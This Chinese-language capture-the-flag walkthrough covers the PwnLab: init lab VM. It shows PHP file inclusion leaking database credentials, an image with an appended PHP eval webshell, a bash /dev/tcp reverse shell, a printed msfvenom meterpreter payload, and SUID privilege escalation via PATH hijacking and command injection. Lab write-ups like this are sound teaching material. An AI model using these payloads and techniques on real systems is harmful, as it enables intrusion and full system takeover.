// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
        if (isset($_GET['page']))
        {
                include($_GET['page'].".php");
        }
        else
        {
                echo "Use this server to upload and share image files inside the intranet";
        }
?>
</center>
</body>
</html>
  • 这里就知道为什么刚刚只有 php://filter 可以使用了,后端访问的内容只能是 php 文件,并且后续图片马上传时也不能使用 page 参数进行包含了。
  • 同时,Cookie 位置也允许实现文件包含,也是一个利用点。

config.php

  • 看看 config 的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in /usr/share/wordlists/wfuzz/general 
$ curl "http://10.10.8.18/?page=php://filter/read=convert.base64-encode/resource=config"
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+</center>
</body>
</html>
  • 解码:
1
2
root at kali in /usr/share/wordlists/wfuzz/general 
$ echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 -d > config.php
  • config.php 页面内容如下:
1
2
3
4
5
6
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

MySQL 远程连接

  • 尝试使用这个账号密码去登录网页:

image-20231127182611410

  • 很明显,失败了,不过对方开发了 3306 端口,有木有可能可以远程连接?尝试一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 开启 Kali 的 MySQL 服务
root at kali in /pwnlab 
$ systemctl start mysql

# 远程连接,若是显示报错重启靶场即可
root at kali in /pwnlab 
$ mysql -uroot -pH4u%QJ_H99 -h10.10.8.18   
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>
  • 翻一翻:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.001 sec)

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.001 sec)
  • 发现了三个用户密码,解码一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# kent
root at kali in /pwnlab 
$ echo Sld6WHVCSkpOeQ== | base64 -d  
JWzXuBJJNy

# mike
root at kali in /pwnlab 
$ echo U0lmZHNURW42SQ== | base64 -d 
SIfdsTEn6I

# kane
root at kali in /pwnlab 
$ echo aVN2NVltMkdSbw== | base64 -d 
iSv5Ym2GRo

文件上传

AntSword

  • 有了用户就尝试登录:

image-20231127184240950

  • 欧克,登上来了,根据之前的分析,需要上传个图片马,做一个:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in /pwnlab 
$ wget http://10.10.8.18/images/pwnlab.png                                                             
--2023-11-27 18:44:42--  http://10.10.8.18/images/pwnlab.png
Connecting to 10.10.8.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13027 (13K) [image/png]
Saving to: ‘pwnlab.png’

pwnlab.png            100%[===================================================================>]  12.72K  --.-KB/s    in 0s

2023-11-27 18:44:42 (27.6 MB/s) - ‘pwnlab.png’ saved [13027/13027]

root at kali in /pwnlab 
$ echo '<?php @eval($_REQUEST[1]);phpinfo();?>' >> pwnlab.png

root at kali in /pwnlab 
$ tail -c 100 pwnlab.png
Ժ���6l�ش��^:����������n"쨣�qj��q[dV�V�>IEND�B`�<?php @eval($_REQUEST[1]);phpinfo();?>
  • 上传一下:

image-20231127184708536

  • 上传成功,查找文件上传位置:

image-20231127184756067

  • 包含试试,由于 page 参数无法进行此类文件包含,需要使用 $_COOKIE['lang'] 参数:

image-20231127185730917

  • 成功包含,使用蚁剑连接(记得加 Cookie):

image-20231127190010229

  • 由于蚁剑的 Shell 不具有交互性,使用 nc 反弹一个:
1
2
3
4
5
# Kali
nc -lvvp 4444

# AntSword
bash -c 'bash -i &> /dev/tcp/10.10.8.21/4444 0>&1'

image-20231127190634868

  • 反弹成功!

MSF

  • 由于可能有同学 AntSword 没装,这里也使用 MSF 演示一下。
  • 生成 PHP WebShell:
1
2
3
4
5
6
7
root at kali in /pwnlab 
$ msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.8.21 lport=6666 -o msf.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes
Saved as: msf.php
  • 制作图片马:
1
2
3
4
5
6
root at kali in /pwnlab 
$ cat msf.php >> pwnlab.png

root at kali in /pwnlab 
$ tail -c 1200 pwnlab.png
M���k▒�ohX����Y�J�R�n�5�u[tԺ���6l�ش��^:����������n"쨣�qj��q[dV�V�>IEND�B`�/*<?php /**/ error_reporting(0); $ip = '10.10.8.21'; $port = 6666; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
  • 在 MSF 中开启监听:
1
2
3
4
5
6
7
8
9
10
11
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set lhost 10.10.8.21
lhost => 10.10.8.21
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.8.21:6666
  • 上传图片,和之前蚁剑一样进行 Cookie 访问:

image-20231127192257667

  • 成功反弹!,升级一下 Shell:
1
2
3
4
5
6
7
meterpreter > shell
Process 1331 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

用户切换

  • 查看当前用户:
1
2
3
4
5
6
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
  • 可以发现用户有很多,根据之前数据库中拿到的账号密码来看,有符合的用户,登录一下:
1
2
3
4
5
6
7
8
9
10
11
12
www-data@pwnlab:/var/www/html$ su kent
su kent
Password: JWzXuBJJNy

kent@pwnlab:/var/www/html$ ls -al /home/kent
ls -al /home/kent
total 20
drwxr-x--- 2 kent kent 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kent kent  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kent kent 3515 Mar 17  2016 .bashrc
-rw-r--r-- 1 kent kent  675 Mar 17  2016 .profile
  • kent 用户没啥有用的,换一个:
1
2
3
4
kent@pwnlab:/var/www/html$ su mike
su mike
Password: SIfdsTEn6I
su: Authentication failure
  • mike 用户登不上,再换一个:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
kent@pwnlab:/var/www/html$ su kane
su kane
Password: iSv5Ym2GRo

kane@pwnlab:/var/www/html$ id 
id
uid=1003(kane) gid=1003(kane) groups=1003(kane)
kane@pwnlab:/var/www/html$ ls -al /home/kane
ls -al /home/kane
total 28
drwxr-x--- 2 kane kane 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile

SUID 提权(1)

  • 在 kane 用户下发现了一个具有 SUID、SGID 权限的可执行文件,但权限是 mike。
  • 执行看看结果:
1
2
3
kane@pwnlab:/var/www/html$ /home/kane/msgmike
/home/kane/msgmike
cat: /home/mike/msg.txt: No such file or directory
  • 报错了,出现了 cat 命令字样,第一时间就想到了环境变量问题,创建一个 cat 文件,将其目录进行前置:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
kane@pwnlab:/var/www/html$ type cat
type cat
cat is /bin/cat
kane@pwnlab:/var/www/html$ echo $PATH
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

kane@pwnlab:/var/www/html$ cd ~
cd ~
kane@pwnlab:~$ echo '/bin/bash' > cat
echo '/bin/bash' > cat
kane@pwnlab:~$ cat cat
cat cat
/bin/bash
kane@pwnlab:~$ PATH=/home/kane:$PATH                                                   
PATH=/home/kane:$PATH
kane@pwnlab:~$ echo $PATH
echo $PATH
/home/kane:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ ls -al
ls -al
total 32
drwxr-x--- 2 kane kane 4096 Nov 27 06:50 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
-rwxrwxrwx 1 kane kane   10 Nov 27 06:50 cat
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
  • 执行一下:
1
2
3
4
5
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$ id
id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
  • 切换成功。

SUID 提权(2)

  • 查看下 mike 用户的家目录:
1
2
3
4
5
6
7
8
9
10
11
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls -al
ls -al
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile

  • 嗯哼,又一个具有 SUID、SGID 权限的可执行文件,并且权限是 root。

  • 执行一下:

1
2
3
4
5
6
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: xixihaha
xixihaha
xixihaha
mike@pwnlab:/home/mike$
  • 看着是一个留言功能文件,猜测源码应该差不多是这样的:
1
2
3
4
#!/bin/bash

read -p 'Message for root:' result
echo $result
  • 使用 ; 进行命令拼接试试:
1
2
3
4
5
6
7
8
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: xixi;/bin/bash -p
xixi;/bin/bash -p
xixi
bash-4.3# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
  • 提权成功,查看 flag:

注:这里使用 cat 查看会报错,暂时不知道原因。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
bash-4.3# less flag.txt
less flag.txt
WARNING: terminal is not fully functional
flag.txt  (press RETURN)
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
flag.txt (END)